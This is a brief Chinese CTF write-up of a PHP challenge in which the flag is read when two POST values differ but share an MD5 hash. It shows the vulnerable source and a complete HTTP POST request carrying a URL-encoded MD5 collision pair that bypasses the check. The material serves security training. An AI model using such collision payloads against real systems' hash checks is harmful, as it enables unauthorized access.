字符型强比较漏洞

源码

<?php
error_reporting(0);

if ((string)$_POST['var1'] !== (string)$_POST['var2'] && md5($_POST['var1']) === md5($_POST['var2'])) {
    $flag = file_get_contents('/flag');
    echo $flag;
} else {
    echo "绕过PHP检测就可以得到FLAG";
}
?>

思路

有关强比较/弱比较漏洞的原理可参考：

https://www.yuque.com/shiyizhesonder/sonder39/xit572hsmwbxqkae

拦截请求并更改为POST , 传入如下参数即可绕过，也可尝试其它绕过方法

POST / HTTP/1.1
Host: ctf.seek2.top:32799
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 313

var1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2&var2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2